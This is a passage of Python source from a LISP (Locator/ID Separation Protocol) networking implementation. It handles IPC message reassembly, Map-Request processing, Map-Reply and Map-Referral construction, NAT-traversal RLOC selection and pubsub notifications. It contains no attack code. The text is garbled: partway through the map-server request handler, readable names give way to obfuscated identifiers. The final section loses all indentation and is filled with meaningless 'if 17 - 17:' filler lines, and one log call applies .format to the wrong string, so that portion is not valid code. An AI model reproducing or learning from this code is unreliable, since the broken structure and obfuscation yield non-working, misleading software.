        if (internal == False):
            packet = data[0]
            source = lisp_convert_6to4(data[1][0])
            port = data[1][1]

            if (port == LISP_DATA_PORT):
                do_log = lisp_data_plane_logging
                packet_str = lisp_format_packet(packet[0:60]) + " ..."
            else:
                do_log = True
                packet_str = lisp_format_packet(packet)

            if (do_log):
                lprint("{} {} bytes {} {}, packet: {}".format(
                    bold("Receive", False), len(packet),
                    bold("from " + source, False), port, packet_str))

            return(["packet", source, port, packet])

        #
        # Internal IPC messages have the form
        # <opcode>@<total-length>@<source>@<port>@<payload> and may arrive
        # segmented. Loop until a whole message is reassembled.
        #
        done = False
        message = data[0]
        malformed = False

        while (done == False):
            message = message.split("@")

            if (len(message) < 4):
                lprint(("Possible fragment (length {}), from old message, " +
                    "discarding").format(len(message[0])))
                malformed = True
                break

            opcode = message[0]
            try:
                total_length = int(message[1])
            except:
                error_str = bold("Internal packet reassembly error", False)
                lprint("{}: {}".format(error_str, data))
                malformed = True
                break

            source = message[2]
            port = message[3]

            #
            # If the payload itself contained "@" bytes, split() broke it
            # into extra fields; bit-stuff them back together.
            #
            if (len(message) > 5):
                packet = lisp_bit_stuff(message[4::])
            else:
                packet = message[4]

            #
            # Pull in further segments until total_length bytes arrive.
            #
            done, packet = lisp_receive_segments(lisp_socket, packet, source,
                total_length)
            if (packet == None): return(["", "", "", ""])

            #
            # A new message preempted the old one; parse it from the top.
            #
            if (done == False):
                message = packet
                continue

            if (port == ""): port = "no-port"
            if (opcode == "command" and lisp_i_am_core == False):
                index = packet.find(" {")
                command_str = packet if index == -1 else packet[:index]
                command_str = ": '" + command_str + "'"
            else:
                command_str = ""

            lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
                len(packet), bold("from " + source, False), port, opcode,
                command_str if (opcode in ["command", "api"]) else ": ... " if
                (opcode == "data-packet") else ": " +
                lisp_format_packet(packet)))

        if (malformed): continue
        return([opcode, source, port, packet])

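# End-to-end IPC sketch, pairing the builders above with this receiver
# (hypothetical values): the sender emits
#
#   lisp_command_ipc("show map-cache", "lisp-core")
#     => "command@14@lisp-core@@show map-cache"
#
# and lisp_receive() on the peer socket returns
#   ["command", "lisp-core", "no-port", "show map-cache"].
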
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
    trigger_flag = False
    timestamp = time.time()

    header = lisp_control_header()
    if (header.decode(packet) == None):
        lprint("Could not decode control header")
        return(trigger_flag)

    #
    # Convert the source string into a lisp_address(), unless it names an
    # internal "lisp-" process.
    #
    orig_source = source
    if (source.find("lisp") == -1):
        addr = lisp_address(LISP_AFI_NONE, "", 0, 0)
        addr.string_to_afi(source)
        addr.store_address(source)
        source = addr

    #
    # Dispatch on control message type.
    #
    if (header.type == LISP_MAP_REQUEST):
        lisp_process_map_request(lisp_sockets, packet, None, 0, source,
            udp_sport, False, ttl, timestamp)

    elif (header.type == LISP_MAP_REPLY):
        lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)

    elif (header.type == LISP_MAP_REGISTER):
        lisp_process_map_register(lisp_sockets, packet, source, udp_sport)

    elif (header.type == LISP_MAP_NOTIFY):
        if (orig_source == "lisp-etr"):
            lisp_process_multicast_map_notify(packet, source)
        else:
            if (lisp_is_running("lisp-rtr")):
                lisp_process_multicast_map_notify(packet, source)

            lisp_process_map_notify(lisp_sockets, packet, source)

    elif (header.type == LISP_MAP_NOTIFY_ACK):
        lisp_process_map_notify_ack(packet, source)

    elif (header.type == LISP_MAP_REFERRAL):
        lisp_process_map_referral(lisp_sockets, packet, source)

    elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
        x, y, trigger_flag = lisp_process_info_reply(source, packet, True)

    elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
        addr_str = source.print_address_no_iid()
        lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
            None)

    elif (header.type == LISP_ECM):
        lisp_process_ecm(lisp_sockets, packet, source, udp_sport)

    else:
        lprint("Invalid LISP control packet type {}".format(header.type))

    return(trigger_flag)

def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
    ttl, timestamp):

    probe = bold("RLOC-probe", False)

    if (lisp_i_am_etr):
        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(
            probe))
        lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
            ttl, timestamp)
        return

    if (lisp_i_am_rtr):
        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(
            probe))
        lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
            ttl, timestamp)
        return

    lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(
        probe))
    return

def lisp_process_smr(map_request):
    lprint("Received SMR-based Map-Request")
    return

def lisp_process_smr_invoked_request(map_request):
    lprint("Received SMR-invoked Map-Request")
    return

def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, map_request,
    keys, enc, auth, mr_ttl=-1):

    probe = map_request.rloc_probe if (map_request != None) else False
    json_telemetry = map_request.json_telemetry if (map_request != None) \
        else None

    #
    # Build the Map-Reply header.
    #
    map_reply = lisp_map_reply()
    map_reply.rloc_probe = probe
    map_reply.echo_nonce_capable = enc
    map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
    map_reply.record_count = 1
    map_reply.nonce = nonce
    packet = map_reply.encode()
    map_reply.print_map_reply()

    #
    # Build the single EID record. Telemetry, when requested, is returned
    # as one extra RLOC record.
    #
    eid_record = lisp_eid_record()
    eid_record.rloc_count = len(rloc_set)
    if (json_telemetry != None): eid_record.rloc_count += 1
    eid_record.authoritative = auth
    eid_record.record_ttl = ttl
    eid_record.action = action
    eid_record.eid = eid
    eid_record.group = group

    packet += eid_record.encode()
    eid_record.print_record("  ", False)

    local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()

    probe_rloc = None
    for rloc_entry in rloc_set:
        multicast = rloc_entry.rloc.is_multicast_address()
        rloc_record = lisp_rloc_record()
        probe_bit = probe and (multicast or json_telemetry == None)
        addr_str = rloc_entry.rloc.print_address_no_iid()
        if (addr_str in local_rlocs or multicast):
            rloc_record.local_bit = True
            rloc_record.probe_bit = probe_bit
            rloc_record.keys = keys
            if (rloc_entry.priority == 254 and lisp_i_am_rtr):
                rloc_record.rloc_name = "RTR"

            if (probe_rloc == None): probe_rloc = rloc_entry.rloc

        rloc_record.store_rloc_entry(rloc_entry)
        rloc_record.reach_bit = True
        rloc_record.print_record("    ")
        packet += rloc_record.encode()

    #
    # Append a JSON telemetry RLOC record carrying the etr-out timestamp,
    # if telemetry was requested in the Map-Request.
    #
    if (json_telemetry != None):
        rloc_record = lisp_rloc_record()
        if (probe_rloc): rloc_record.rloc.copy_address(probe_rloc)
        rloc_record.local_bit = True
        rloc_record.probe_bit = True
        rloc_record.reach_bit = True
        telemetry = lisp_encode_telemetry(json_telemetry, eo=str(time.time()))
        rloc_record.json = lisp_json("telemetry", telemetry)
        rloc_record.print_record("    ")
        packet += rloc_record.encode()

    return(packet)

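# Resulting wire layout, as encoded above: one Map-Reply header, one EID
# record, then len(rloc_set) RLOC records, plus one trailing JSON
# "telemetry" RLOC record when the Map-Request carried telemetry.
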
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
    map_referral = lisp_map_referral()
    map_referral.record_count = 1
    map_referral.nonce = nonce
    packet = map_referral.encode()
    map_referral.print_map_referral()

    eid_record = lisp_eid_record()

    ref_count = 0
    if (ddt_entry == None):
        eid_record.eid = eid
        eid_record.group = group
    else:
        ref_count = len(ddt_entry.delegation_set)
        eid_record.eid = ddt_entry.eid
        eid_record.group = ddt_entry.group
        ddt_entry.map_referrals_sent += 1

    eid_record.rloc_count = ref_count
    eid_record.authoritative = True

    #
    # When no action was supplied, decide between node-referral and
    # ms-referral based on the first delegation entry.
    #
    incomplete = False
    if (action == LISP_DDT_ACTION_NULL):
        if (ref_count == 0):
            action = LISP_DDT_ACTION_NODE_REFERRAL
        else:
            ds = ddt_entry.delegation_set[0]
            if (ds.is_ddt_child()):
                action = LISP_DDT_ACTION_NODE_REFERRAL

            if (ds.is_ms_child()):
                action = LISP_DDT_ACTION_MS_REFERRAL

    #
    # Set the incomplete bit when not authoritative for the referral set.
    #
    if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
    if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
        incomplete = (lisp_i_am_ms and ds.is_ms_peer() == False)

    eid_record.action = action
    eid_record.ddt_incomplete = incomplete
    eid_record.record_ttl = ttl

    packet += eid_record.encode()
    eid_record.print_record("  ", True)

    if (ref_count == 0): return(packet)

    for ds in ddt_entry.delegation_set:
        rloc_record = lisp_rloc_record()
        rloc_record.rloc = ds.delegate_address
        rloc_record.priority = ds.priority
        rloc_record.weight = ds.weight
        rloc_record.mpriority = 255
        rloc_record.mweight = 0
        rloc_record.reach_bit = True
        packet += rloc_record.encode()
        rloc_record.print_record("    ")

    return(packet)

def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
    ttl, etr_in_ts):

    if (map_request.target_group.is_null()):
        db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
    else:
        db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
        if (db): db = db.lookup_source_cache(map_request.target_eid, False)

    eid_str = map_request.print_prefix()

    if (db == None):
        lprint("Database-mapping entry not found for requested EID {}". \
            format(green(eid_str, False)))
        return

    db_eid_str = db.print_eid_tuple()

    lprint("Found database-mapping EID-prefix {} for requested EID {}". \
        format(green(db_eid_str, False), green(eid_str, False)))

    #
    # Reply to the first ITR-RLOC; behind a NAT, reply to the outer source.
    #
    itr_rloc = map_request.itr_rlocs[0]
    if (itr_rloc.is_private_address() and lisp_nat_traversal):
        itr_rloc = source

    nonce = map_request.nonce
    enc = lisp_nonce_echoing
    keys = map_request.keys

    #
    # Timestamp inbound telemetry data if requested in the Map-Request.
    #
    telemetry = map_request.json_telemetry
    if (telemetry != None):
        map_request.json_telemetry = lisp_encode_telemetry(telemetry,
            ei=etr_in_ts)

    db.map_replies_sent += 1

    packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
        LISP_NO_ACTION, 1440, map_request, keys, enc, True, ttl)

    #
    # For an RLOC-probe from a possible RTR, data-encapsulate the RLOC-probe
    # Map-Reply so it traverses any NAT in the path.
    #
    if (map_request.rloc_probe and len(lisp_sockets) == 4):
        public = (itr_rloc.is_private_address() == False)
        addr_str = itr_rloc.print_address_no_iid()
        if ((public and lisp_rtr_list.has_key(addr_str)) or sport == 0):
            lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
            return

    #
    # Send Map-Reply to the ITR.
    #
    lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
    return

def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
    ttl, etr_in_ts):

    #
    # Reply to the first ITR-RLOC; use the outer source when it is private.
    #
    itr_rloc = map_request.itr_rlocs[0]
    if (itr_rloc.is_private_address()): itr_rloc = source
    nonce = map_request.nonce

    eid = map_request.target_eid
    group = map_request.target_group

    #
    # The RTR answers with its own RLOCs at priority 254.
    #
    rloc_set = []
    for addr in [lisp_myrlocs[0], lisp_myrlocs[1]]:
        if (addr == None): continue
        rloc = lisp_rloc()
        rloc.rloc.copy_address(addr)
        rloc.priority = 254
        rloc_set.append(rloc)

    enc = lisp_nonce_echoing
    keys = map_request.keys

    #
    # Timestamp inbound telemetry data if requested in the Map-Request.
    #
    telemetry = map_request.json_telemetry
    if (telemetry != None):
        map_request.json_telemetry = lisp_encode_telemetry(telemetry,
            ei=etr_in_ts)

    packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
        1440, map_request, keys, enc, True, ttl)
    lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
    return

def lisp_get_private_rloc_set(target_site_eid, seid, group):
    rloc_set = target_site_eid.registered_rlocs

    source_site_eid = lisp_site_eid_lookup(seid, group, False)
    if (source_site_eid == None): return(rloc_set)

    #
    # Collect the private RLOCs of the target site and remember its first
    # public (non-RTR) RLOC.
    #
    target_rloc = None
    private_set = []
    for rloc_entry in rloc_set:
        if (rloc_entry.is_rtr()): continue
        if (rloc_entry.rloc.is_private_address()):
            new_rloc = copy.deepcopy(rloc_entry)
            private_set.append(new_rloc)
            continue

        target_rloc = rloc_entry
        break

    if (target_rloc == None): return(rloc_set)
    target_rloc = target_rloc.rloc.print_address_no_iid()

    #
    # Find the first public (non-RTR) RLOC of the source site.
    #
    source_rloc = None
    for rloc_entry in source_site_eid.registered_rlocs:
        if (rloc_entry.is_rtr()): continue
        if (rloc_entry.rloc.is_private_address()): continue
        source_rloc = rloc_entry
        break

    if (source_rloc == None): return(rloc_set)
    source_rloc = source_rloc.rloc.print_address_no_iid()

    #
    # With no site-id configured, return private RLOCs when both sites sit
    # behind the same NAT (same public translated address).
    #
    site_id = target_site_eid.site_id
    if (site_id == 0):
        if (source_rloc == target_rloc):
            lprint("Return private RLOCs for sites behind {}".format(
                target_rloc))
            return(private_set)

        return(rloc_set)

    #
    # With site-ids configured, return private RLOCs when both sites are in
    # the same site-id.
    #
    if (site_id == source_site_eid.site_id):
        lprint("Return private RLOCs for sites in site-id {}".format(site_id))
        return(private_set)

    return(rloc_set)

def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
    rtr_list = []
    rloc_set = []

    #
    # Determine whether the Map-Request source is itself one of the
    # registered RTRs (priority 254 marks an RTR RLOC).
    #
    rtr_is_source = False
    rtr_found = False
    for rloc_entry in registered_rloc_set:
        if (rloc_entry.priority != 254): continue
        rtr_found |= True
        if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
        rtr_is_source = True
        break

    #
    # If no RTRs are registered, the site is not behind a NAT; return the
    # registered set unchanged.
    #
    if (rtr_found == False): return(registered_rloc_set)

    #
    # Split the registered set into RTR RLOCs and ETR RLOCs. When this
    # map-server is co-located with an RTR behind a NAT, private addresses
    # are skipped.
    #
    rtr_behind_nat = (os.getenv("LISP_RTR_BEHIND_NAT") != None)

    for rloc_entry in registered_rloc_set:
        if (rtr_behind_nat and rloc_entry.rloc.is_private_address()): continue
        if (multicast == False and rloc_entry.priority == 255): continue
        if (multicast and rloc_entry.mpriority == 255): continue
        if (rloc_entry.priority == 254):
            rtr_list.append(rloc_entry)
        else:
            rloc_set.append(rloc_entry)

    #
    # A requesting RTR gets the ETR RLOCs; everyone else gets the RTR list.
    #
    if (rtr_is_source): return(rloc_set)

    #
    # The requester is not an RTR: return any private ETR RLOCs (useful when
    # ITR and ETR sit behind the same NAT) plus the RTR RLOCs.
    #
    rloc_set = []
    for rloc_entry in registered_rloc_set:
        if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)

    rloc_set += rtr_list
    return(rloc_set)

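# NAT-traversal sketch: suppose a site registered
# [10.0.0.2 (private ETR), 192.0.2.9 (RTR, priority 254)]. An RTR sourcing
# the Map-Request receives [10.0.0.2]; any other requester receives
# [10.0.0.2, 192.0.2.9], so traffic from outside the NAT flows through the
# RTR. (Addresses are hypothetical; LISP_RTR_BEHIND_NAT is assumed unset.)
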
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
    pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
    pubsub.add(reply_eid)
    return

def lisp_convert_reply_to_notify(packet):

    #
    # Pull the record count out of the Map-Reply header and save the nonce.
    #
    record_count = struct.unpack("I", packet[0:4])[0]
    record_count = socket.ntohl(record_count) & 0xff
    nonce = packet[4:12]
    packet = packet[12::]

    #
    # Build a Map-Notify header with the same record count and nonce, and
    # zeroed key-id and auth-length fields.
    #
    first_long = (LISP_MAP_NOTIFY << 28) | record_count
    header = struct.pack("I", socket.htonl(first_long))
    auth = struct.pack("I", 0)

    packet = header + nonce + auth + packet
    return(packet)

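# Header arithmetic sketch: the message type lives in the top 4 bits of the
# first 32-bit word. With LISP_MAP_NOTIFY == 4 (RFC 6833) and one record,
# (4 << 28) | 1 == 0x40000001, so the Map-Reply header is rewritten in
# place while the nonce and EID records are carried over unchanged.
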
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
    eid_str = eid.print_prefix()
    if (lisp_pubsub_cache.has_key(eid_str) == False): return

    #
    # Send a Map-Notify to every subscriber registered for this EID-prefix.
    #
    for pubsub in lisp_pubsub_cache[eid_str].values():
        itr = pubsub.itr
        port = pubsub.port
        itr_str = red(itr.print_address_no_iid(), False)
        sub_str = bold("subscriber", False)
        xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
        nonce = "0x" + lisp_hex_string(pubsub.nonce)

        lprint("    Notify {} {}:{} xtr-id {} for {}, nonce {}".format(
            sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))

        lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
            port, pubsub.nonce, 0, 0, 0, site, False)
        pubsub.map_notify_count += 1

    return

def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
    ttl, xtr_id):

    #
    # Store subscription state for this ITR and xtr-id.
    #
    lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)

    eid = green(reply_eid.print_prefix(), False)
    itr = red(itr_rloc.print_address_no_iid(), False)
    notify = bold("Map-Notify", False)
    xtr_id = "0x" + lisp_hex_string(xtr_id)
    lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(notify,
        eid, itr, xtr_id))

    #
    # Acknowledge the subscription by turning the Map-Reply into a
    # Map-Notify and sending it to the ITR.
    #
    packet = lisp_convert_reply_to_notify(packet)
    lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
    return

def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
    mr_sport, ecm_source):

    #
    # Pull out the Map-Request fields used below.
    #
    iiI1I1IIi = map_request.target_eid
    OOo0oOOO0 = map_request.target_group
    Ii1i1 = lisp_print_eid_tuple(iiI1I1IIi, OOo0oOOO0)
    o00O00oOO00 = map_request.itr_rlocs[0]
    IIiiII11i11I = map_request.xtr_id
    o0OOO = map_request.nonce
    iI1IIi1I = LISP_NO_ACTION
    I1IIiI = map_request.subscribe_bit

    #
    # Verify the Map-Request signature when the target is a crypto-hash EID.
    #
    i11Ii11I1I1II = True
    i1Oo0o = (lisp_get_eid_hash(iiI1I1IIi) != None)
    if (i1Oo0o):
        i1i11 = map_request.map_request_signature
        if (i1i11 == None):
            i11Ii11I1I1II = False
            lprint(("EID-crypto-hash signature verification {}, " +
                "no signature found").format(bold("failed", False)))
        else:
            I1IiI11 = map_request.signature_eid
            ooO, OoOoOoooOoo0, i11Ii11I1I1II = lisp_lookup_public_key(I1IiI11)
            if (i11Ii11I1I1II):
                i11Ii11I1I1II = map_request.verify_map_request_sig(
                    OoOoOoooOoo0)
            else:
                lprint("Public-key lookup failed for sig-eid {}, hash-eid {}". \
                    format(I1IiI11.print_address(), ooO.print_address()))

            iIi111I1I = bold("passed", False) if i11Ii11I1I1II else \
                bold("failed", False)
            lprint("EID-crypto-hash signature verification {}".format(
                iIi111I1I))

    if (I1IIiI and i11Ii11I1I1II == False):
        I1IIiI = False
        lprint("Suppress creating pubsub state due to signature failure")

    #
    # Reply to the ITR-RLOC when its AFI matches the ECM source; otherwise
    # reply to the ECM outer source.
    #
    IiiIii1I11iiIiIii = o00O00oOO00 if (o00O00oOO00.afi == ecm_source.afi) \
        else ecm_source

    oOOOO0ooo = lisp_site_eid_lookup(iiI1I1IIi, OOo0oOOO0, False)

    if (oOOOO0ooo == None or oOOOO0ooo.is_star_g()):
        IIIiiIIiII11 = bold("Site not found", False)
        lprint("{} for requested EID {}".format(IIIiiIIiII11,
            green(Ii1i1, False)))

        #
        # Send negative Map-Reply with a 15-minute TTL.
        #
        lisp_send_negative_map_reply(lisp_sockets, iiI1I1IIi, OOo0oOOO0,
            o0OOO, o00O00oOO00, mr_sport, 15, IIiiII11i11I, I1IIiI)

        return([iiI1I1IIi, OOo0oOOO0, LISP_DDT_ACTION_SITE_NOT_FOUND])

    iIIiIIiII111 = oOOOO0ooo.print_eid_tuple()
    i11I11iiiI1 = oOOOO0ooo.site.site_name

    #
    # A site can require signed Map-Requests even for non-crypto-hash EIDs.
    #
    if (i1Oo0o == False and oOOOO0ooo.require_signature):
        i1i11 = map_request.map_request_signature
        I1IiI11 = map_request.signature_eid
        if (i1i11 == None or I1IiI11.is_null()):
            lprint("Signature required for site {}".format(i11I11iiiI1))
            i11Ii11I1I1II = False
        else:
            I1IiI11 = map_request.signature_eid
            ooO, OoOoOoooOoo0, i11Ii11I1I1II = lisp_lookup_public_key(I1IiI11)
            if (i11Ii11I1I1II):
                i11Ii11I1I1II = map_request.verify_map_request_sig(
                    OoOoOoooOoo0)
            else:
                lprint("Public-key lookup failed for sig-eid {}, hash-eid {}". \
                    format(I1IiI11.print_address(), ooO.print_address()))

            iIi111I1I = bold("passed", False) if i11Ii11I1I1II else \
                bold("failed", False)
            lprint("Required signature verification {}".format(iIi111I1I))

    #
    # If the site is not registered, return a negative Map-Reply with the
    # site's configured (or forced) TTL.
    #
    if (i11Ii11I1I1II and oOOOO0ooo.registered == False):
        lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
            format(i11I11iiiI1, green(iIIiIIiII111, False),
            green(Ii1i1, False)))

        #
        # Widen the negative Map-Reply prefix to the registered prefix when
        # more-specifics are not accepted.
        #
        if (oOOOO0ooo.accept_more_specifics == False):
            iiI1I1IIi = oOOOO0ooo.eid
            OOo0oOOO0 = oOOOO0ooo.group

        Oo0o0 = 1
        if (oOOOO0ooo.force_ttl != None):
            Oo0o0 = oOOOO0ooo.force_ttl | 0x80000000

        lisp_send_negative_map_reply(lisp_sockets, iiI1I1IIi, OOo0oOOO0,
            o0OOO, o00O00oOO00, mr_sport, Oo0o0, IIiiII11i11I, I1IIiI)

        return([iiI1I1IIi, OOo0oOOO0, LISP_DDT_ACTION_MS_NOT_REG])

    #
    # Decide whether this map-server proxy-replies, and with what action.
    #
    oO0ooo = False
    Ii1 = ""
    oO0Oooo = False
    if (oOOOO0ooo.force_nat_proxy_reply):
        Ii1 = ", nat-forced"
        oO0ooo = True
        oO0Oooo = True
    elif (oOOOO0ooo.force_proxy_reply):
        Ii1 = ", forced"
        oO0Oooo = True
    elif (oOOOO0ooo.proxy_reply_requested):
        Ii1 = ", requested"
        oO0Oooo = True
    elif (map_request.pitr_bit and oOOOO0ooo.pitr_proxy_reply_drop):
        Ii1 = ", drop-to-pitr"
        iI1IIi1I = LISP_DROP_ACTION
    elif (oOOOO0ooo.proxy_reply_action != ""):
        iI1IIi1I = oOOOO0ooo.proxy_reply_action
        Ii1 = ", forced, action {}".format(iI1IIi1I)
        iI1IIi1I = LISP_DROP_ACTION if (iI1IIi1I == "drop") else \
            LISP_NATIVE_FORWARD_ACTION

    #
    # Apply any policy configured for the site to the Map-Request.
    #
    oo0OO000OooO0 = False
    IiiIIIII = None
    if (oO0Oooo and lisp_policies.has_key(oOOOO0ooo.policy)):
        IiI1i1i1 = lisp_policies[oOOOO0ooo.policy]
        if (IiI1i1i1.match_policy_map_request(map_request, mr_source)):
            IiiIIIII = IiI1i1i1

        if (IiiIIIII):
            iI1oOoo = bold("matched", False)
            lprint("Map-Request {} policy '{}', set-action '{}'".format(
                iI1oOoo, IiI1i1i1.policy_name, IiI1i1i1.set_action))
        else:
            iI1oOoo = bold("no match", False)
            lprint("Map-Request {} for policy '{}', implied drop".format(
                iI1oOoo, IiI1i1i1.policy_name))
            oo0OO000OooO0 = True

    if (Ii1 != ""):
        lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
            format(green(Ii1i1, False), i11I11iiiI1,
            green(iIIiIIiII111, False), Ii1))

        OoO0oOOooOO = oOOOO0ooo.registered_rlocs
        Oo0o0 = 1440
        if (oO0ooo):

            #
            # Return private RLOCs when source and target sites share a
            # site-id or sit behind the same NAT; otherwise return a partial
            # NAT-traversal RLOC set with a short 15-minute TTL.
            #
            if (oOOOO0ooo.site_id != 0):
                i1I1I = map_request.source_eid
                OoO0oOOooOO = lisp_get_private_rloc_set(oOOOO0ooo, i1I1I,
                    OOo0oOOO0)

            if (OoO0oOOooOO == oOOOO0ooo.registered_rlocs):
                i1iI11i = (oOOOO0ooo.group.is_null() == False)
                OOO = lisp_get_partial_rloc_set(OoO0oOOooOO,
                    IiiIii1I11iiIiIii, i1iI11i)
                if (OOO != OoO0oOOooOO):
                    Oo0o0 = 15
                    OoO0oOOooOO = OOO

        if (oOOOO0ooo.force_ttl != None):
            Oo0o0 = oOOOO0ooo.force_ttl | 0x80000000

        #
        # A matched policy can override the record TTL.
        #
        if (IiiIIIII):
            if (IiiIIIII.set_record_ttl):
                Oo0o0 = IiiIIIII.set_record_ttl
                lprint("Policy set-record-ttl to {}".format(Oo0o0))
if 17 - 17: iIii1I11I1II1 - Oo0Ooo
if ( IiiIIIII . set_action == "drop" ) :
lprint ( "Policy set-action drop, send negative Map-Reply" )
iI1IIi1I = LISP_POLICY_DENIED_ACTION
OoO0oOOooOO = [ ]
else :
I1II = IiiIIIII . set_policy_map_reply ( )
if ( I1II ) : OoO0oOOooOO = [ I1II ]
if 25 - 25: O0 + I1ii11iIi11i
if 53 - 53: OoooooooOO . Oo0Ooo
if 35 - 35: OOooOOo % i11iIiiIii % ooOoO0o . O0
if ( oo0OO000OooO0 ) :
lprint ( "Implied drop action, send negative Map-Reply" )
iI1IIi1I = LISP_POLICY_DENIED_ACTION
OoO0oOOooOO = [ ]
if 9 - 9: ooOoO0o + iII111i / i1IIi % Oo0Ooo - o0oOOo0O0Ooo / I1IiiI
if 42 - 42: OOooOOo + oO0o % O0 * I1ii11iIi11i + i11iIiiIii
i11 = oOOOO0ooo . echo_nonce_capable
if 16 - 16: i1IIi . I11i + OoO0O00 % Ii1I * IiII + I1IiiI
if 96 - 96: II111iiii + O0 - II111iiii
if 97 - 97: I1IiiI
if 87 - 87: I11i + iIii1I11I1II1
if ( i11Ii11I1I1II ) :
oOOooO0oo = oOOOO0ooo . eid
O00o = oOOOO0ooo . group
else :
oOOooO0oo = iiI1I1IIi
O00o = OOo0oOOO0
iI1IIi1I = LISP_AUTH_FAILURE_ACTION
OoO0oOOooOO = [ ]
if 66 - 66: i11iIiiIii % i11iIiiIii
if 38 - 38: iIii1I11I1II1
if 80 - 80: OoO0O00
if 72 - 72: I11i * II111iiii
if 82 - 82: I1Ii111 . OoO0O00 * II111iiii
if 99 - 99: iIii1I11I1II1 / iII111i % i1IIi - II111iiii / OoO0O00
packet = lisp_build_map_reply ( oOOooO0oo , O00o , OoO0oOOooOO ,
o0OOO , iI1IIi1I , Oo0o0 , map_request , None , i11 , False )
if 33 - 33: OoooooooOO / i1IIi . Ii1I
if ( I1IIiI ) :
lisp_process_pubsub ( lisp_sockets , packet , oOOooO0oo , o00O00oOO00 ,
mr_sport , o0OOO , Oo0o0 , IIiiII11i11I )
else :
lisp_send_map_reply ( lisp_sockets , packet , o00O00oOO00 , mr_sport )
if 96 - 96: OoOoOO00 / Oo0Ooo . II111iiii / ooOoO0o
if 56 - 56: IiII - ooOoO0o % oO0o / Oo0Ooo * oO0o % O0
return ( [ oOOOO0ooo . eid , oOOOO0ooo . group , LISP_DDT_ACTION_MS_ACK ] )
if 71 - 71: iII111i / II111iiii - II111iiii / I1IiiI
if 24 - 24: O0 . I1IiiI + IiII . IiII
if 53 - 53: II111iiii + Ii1I * o0oOOo0O0Ooo
if 47 - 47: Ii1I % OOooOOo . Oo0Ooo
if 94 - 94: Ii1I - iIii1I11I1II1 + I1IiiI - iIii1I11I1II1 . o0oOOo0O0Ooo
I1i1III1I1 = len ( oOOOO0ooo . registered_rlocs )
if ( I1i1III1I1 == 0 ) :
lprint ( "Requested EID {} found site '{}' with EID-prefix {} with " + "no registered RLOCs" . format ( green ( Ii1i1 , False ) , i11I11iiiI1 ,
# Ii1I
green ( iIIiIIiII111 , False ) ) )
return ( [ oOOOO0ooo . eid , oOOOO0ooo . group , LISP_DDT_ACTION_MS_ACK ] )
if 31 - 31: OoOoOO00
if 72 - 72: II111iiii + i11iIiiIii * OoO0O00 / II111iiii / I11i
if 59 - 59: OOooOOo
if 9 - 9: I1IiiI + I1IiiI / I11i - OOooOOo % iIii1I11I1II1 / I1ii11iIi11i
if 40 - 40: I1Ii111 - OOooOOo * IiII + o0oOOo0O0Ooo - I1IiiI
o00oOOoo0o = map_request . target_eid if map_request . source_eid . is_null ( ) else map_request . source_eid
if 26 - 26: IiII + OOooOOo / I1Ii111 . i1IIi
I1iI1111ii1I1 = map_request . target_eid . hash_address ( o00oOOoo0o )
I1iI1111ii1I1 %= I1i1III1I1
oo00 = oOOOO0ooo . registered_rlocs [ I1iI1111ii1I1 ]
if 52 - 52: O0 - I1Ii111 . oO0o
if ( oo00 . rloc . is_null ( ) ) :
lprint ( ( "Suppress forwarding Map-Request for EID {} at site '{}' " + "EID-prefix {}, no RLOC address" ) . format ( green ( Ii1i1 , False ) ,
# iII111i - I1ii11iIi11i * Ii1I
i11I11iiiI1 , green ( iIIiIIiII111 , False ) ) )
else :
lprint ( ( "Forwarding Map-Request for EID {} to ETR {} at site '{}' " + "EID-prefix {}" ) . format ( green ( Ii1i1 , False ) ,
# I1ii11iIi11i - I1ii11iIi11i - oO0o % I11i * OoO0O00 . i1IIi
red ( oo00 . rloc . print_address ( ) , False ) , i11I11iiiI1 ,
green ( iIIiIIiII111 , False ) ) )
if 35 - 35: I11i . IiII + ooOoO0o
if 19 - 19: O0 - i1IIi / I1Ii111
if 14 - 14: I11i - i11iIiiIii
if 49 - 49: oO0o . I1ii11iIi11i
